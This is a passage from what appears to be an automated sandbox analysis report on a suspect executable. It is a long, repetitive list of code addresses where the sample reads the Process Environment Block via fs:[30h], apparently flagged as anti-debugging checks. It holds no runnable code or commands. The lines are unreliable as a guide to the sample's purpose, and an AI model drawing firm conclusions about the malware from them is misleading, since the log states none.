                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C0185 mov eax, dword ptr fs:[00000030h]5_2_015C0185
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01624180 mov eax, dword ptr fs:[00000030h]5_2_01624180
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01624180 mov eax, dword ptr fs:[00000030h]5_2_01624180
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163C188 mov eax, dword ptr fs:[00000030h]5_2_0163C188
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163C188 mov eax, dword ptr fs:[00000030h]5_2_0163C188
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160019F mov eax, dword ptr fs:[00000030h]5_2_0160019F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160019F mov eax, dword ptr fs:[00000030h]5_2_0160019F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160019F mov eax, dword ptr fs:[00000030h]5_2_0160019F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160019F mov eax, dword ptr fs:[00000030h]5_2_0160019F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582050 mov eax, dword ptr fs:[00000030h]5_2_01582050
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AC073 mov eax, dword ptr fs:[00000030h]5_2_015AC073
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01606050 mov eax, dword ptr fs:[00000030h]5_2_01606050
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E016 mov eax, dword ptr fs:[00000030h]5_2_0159E016
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E016 mov eax, dword ptr fs:[00000030h]5_2_0159E016
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E016 mov eax, dword ptr fs:[00000030h]5_2_0159E016
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E016 mov eax, dword ptr fs:[00000030h]5_2_0159E016
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616030 mov eax, dword ptr fs:[00000030h]5_2_01616030
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01604000 mov ecx, dword ptr fs:[00000030h]5_2_01604000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01622000 mov eax, dword ptr fs:[00000030h]5_2_01622000
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A020 mov eax, dword ptr fs:[00000030h]5_2_0157A020
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157C020 mov eax, dword ptr fs:[00000030h]5_2_0157C020
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016060E0 mov eax, dword ptr fs:[00000030h]5_2_016060E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157C0F0 mov eax, dword ptr fs:[00000030h]5_2_0157C0F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015C20F0 mov ecx, dword ptr fs:[00000030h]5_2_015C20F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015880E9 mov eax, dword ptr fs:[00000030h]5_2_015880E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A0E3 mov ecx, dword ptr fs:[00000030h]5_2_0157A0E3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016020DE mov eax, dword ptr fs:[00000030h]5_2_016020DE
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016180A8 mov eax, dword ptr fs:[00000030h]5_2_016180A8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158208A mov eax, dword ptr fs:[00000030h]5_2_0158208A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016460B8 mov eax, dword ptr fs:[00000030h]5_2_016460B8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016460B8 mov ecx, dword ptr fs:[00000030h]5_2_016460B8
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162437C mov eax, dword ptr fs:[00000030h]5_2_0162437C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01602349 mov eax, dword ptr fs:[00000030h]5_2_01602349
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01628350 mov ecx, dword ptr fs:[00000030h]5_2_01628350
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0164A352 mov eax, dword ptr fs:[00000030h]5_2_0164A352
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160035C mov eax, dword ptr fs:[00000030h]5_2_0160035C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160035C mov eax, dword ptr fs:[00000030h]5_2_0160035C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160035C mov eax, dword ptr fs:[00000030h]5_2_0160035C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160035C mov ecx, dword ptr fs:[00000030h]5_2_0160035C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160035C mov eax, dword ptr fs:[00000030h]5_2_0160035C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160035C mov eax, dword ptr fs:[00000030h]5_2_0160035C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157C310 mov ecx, dword ptr fs:[00000030h]5_2_0157C310
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A0310 mov ecx, dword ptr fs:[00000030h]5_2_015A0310
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA30B mov eax, dword ptr fs:[00000030h]5_2_015BA30B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA30B mov eax, dword ptr fs:[00000030h]5_2_015BA30B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA30B mov eax, dword ptr fs:[00000030h]5_2_015BA30B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A3C0 mov eax, dword ptr fs:[00000030h]5_2_0158A3C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A3C0 mov eax, dword ptr fs:[00000030h]5_2_0158A3C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A3C0 mov eax, dword ptr fs:[00000030h]5_2_0158A3C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A3C0 mov eax, dword ptr fs:[00000030h]5_2_0158A3C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A3C0 mov eax, dword ptr fs:[00000030h]5_2_0158A3C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A3C0 mov eax, dword ptr fs:[00000030h]5_2_0158A3C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015883C0 mov eax, dword ptr fs:[00000030h]5_2_015883C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015883C0 mov eax, dword ptr fs:[00000030h]5_2_015883C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015883C0 mov eax, dword ptr fs:[00000030h]5_2_015883C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015883C0 mov eax, dword ptr fs:[00000030h]5_2_015883C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016063C0 mov eax, dword ptr fs:[00000030h]5_2_016063C0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B63FF mov eax, dword ptr fs:[00000030h]5_2_015B63FF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F0 mov eax, dword ptr fs:[00000030h]5_2_0159E3F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F0 mov eax, dword ptr fs:[00000030h]5_2_0159E3F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0159E3F0 mov eax, dword ptr fs:[00000030h]5_2_0159E3F0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163C3CD mov eax, dword ptr fs:[00000030h]5_2_0163C3CD
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015903E9 mov eax, dword ptr fs:[00000030h]5_2_015903E9
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016243D4 mov eax, dword ptr fs:[00000030h]5_2_016243D4
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016243D4 mov eax, dword ptr fs:[00000030h]5_2_016243D4
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov eax, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov eax, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov ecx, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0162E3DB mov eax, dword ptr fs:[00000030h]5_2_0162E3DB
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578397 mov eax, dword ptr fs:[00000030h]5_2_01578397
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578397 mov eax, dword ptr fs:[00000030h]5_2_01578397
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01578397 mov eax, dword ptr fs:[00000030h]5_2_01578397
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A438F mov eax, dword ptr fs:[00000030h]5_2_015A438F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A438F mov eax, dword ptr fs:[00000030h]5_2_015A438F
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E388 mov eax, dword ptr fs:[00000030h]5_2_0157E388
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E388 mov eax, dword ptr fs:[00000030h]5_2_0157E388
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157E388 mov eax, dword ptr fs:[00000030h]5_2_0157E388
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01586259 mov eax, dword ptr fs:[00000030h]5_2_01586259
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157A250 mov eax, dword ptr fs:[00000030h]5_2_0157A250
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01630274 mov eax, dword ptr fs:[00000030h]5_2_01630274
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01608243 mov eax, dword ptr fs:[00000030h]5_2_01608243
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01608243 mov ecx, dword ptr fs:[00000030h]5_2_01608243
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A250 mov eax, dword ptr fs:[00000030h]5_2_0163A250
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0163A250 mov eax, dword ptr fs:[00000030h]5_2_0163A250
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584260 mov eax, dword ptr fs:[00000030h]5_2_01584260
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584260 mov eax, dword ptr fs:[00000030h]5_2_01584260
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01584260 mov eax, dword ptr fs:[00000030h]5_2_01584260
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157826B mov eax, dword ptr fs:[00000030h]5_2_0157826B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157823B mov eax, dword ptr fs:[00000030h]5_2_0157823B
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0158A2C3 mov eax, dword ptr fs:[00000030h]5_2_0158A2C3
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902E1 mov eax, dword ptr fs:[00000030h]5_2_015902E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902E1 mov eax, dword ptr fs:[00000030h]5_2_015902E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902E1 mov eax, dword ptr fs:[00000030h]5_2_015902E1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov ecx, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016162A0 mov eax, dword ptr fs:[00000030h]5_2_016162A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE284 mov eax, dword ptr fs:[00000030h]5_2_015BE284
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE284 mov eax, dword ptr fs:[00000030h]5_2_015BE284
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600283 mov eax, dword ptr fs:[00000030h]5_2_01600283
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600283 mov eax, dword ptr fs:[00000030h]5_2_01600283
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01600283 mov eax, dword ptr fs:[00000030h]5_2_01600283
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902A0 mov eax, dword ptr fs:[00000030h]5_2_015902A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015902A0 mov eax, dword ptr fs:[00000030h]5_2_015902A0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588550 mov eax, dword ptr fs:[00000030h]5_2_01588550
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01588550 mov eax, dword ptr fs:[00000030h]5_2_01588550
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B656A mov eax, dword ptr fs:[00000030h]5_2_015B656A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B656A mov eax, dword ptr fs:[00000030h]5_2_015B656A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B656A mov eax, dword ptr fs:[00000030h]5_2_015B656A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01616500 mov eax, dword ptr fs:[00000030h]5_2_01616500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE53E mov eax, dword ptr fs:[00000030h]5_2_015AE53E
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01654500 mov eax, dword ptr fs:[00000030h]5_2_01654500
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01590535 mov eax, dword ptr fs:[00000030h]5_2_01590535
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015865D0 mov eax, dword ptr fs:[00000030h]5_2_015865D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA5D0 mov eax, dword ptr fs:[00000030h]5_2_015BA5D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BA5D0 mov eax, dword ptr fs:[00000030h]5_2_015BA5D0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE5CF mov eax, dword ptr fs:[00000030h]5_2_015BE5CF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE5CF mov eax, dword ptr fs:[00000030h]5_2_015BE5CF
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC5ED mov eax, dword ptr fs:[00000030h]5_2_015BC5ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BC5ED mov eax, dword ptr fs:[00000030h]5_2_015BC5ED
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015825E0 mov eax, dword ptr fs:[00000030h]5_2_015825E0
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AE5E7 mov eax, dword ptr fs:[00000030h]5_2_015AE5E7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016005A7 mov eax, dword ptr fs:[00000030h]5_2_016005A7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016005A7 mov eax, dword ptr fs:[00000030h]5_2_016005A7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_016005A7 mov eax, dword ptr fs:[00000030h]5_2_016005A7
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE59C mov eax, dword ptr fs:[00000030h]5_2_015BE59C
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015B4588 mov eax, dword ptr fs:[00000030h]5_2_015B4588
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582582 mov eax, dword ptr fs:[00000030h]5_2_01582582
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_01582582 mov ecx, dword ptr fs:[00000030h]5_2_01582582
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A45B1 mov eax, dword ptr fs:[00000030h]5_2_015A45B1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A45B1 mov eax, dword ptr fs:[00000030h]5_2_015A45B1
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015A245A mov eax, dword ptr fs:[00000030h]5_2_015A245A
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0160C460 mov ecx, dword ptr fs:[00000030h]5_2_0160C460
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_0157645D mov eax, dword ptr fs:[00000030h]5_2_0157645D
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015BE443 mov eax, dword ptr fs:[00000030h]5_2_015BE443
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AA470 mov eax, dword ptr fs:[00000030h]5_2_015AA470
                Source: C:\Users\user\Desktop\BcF3o0Egke.exeCode function: 5_2_015AA470 mov eax, dword ptr fs:[00000030h]5_2_015AA470
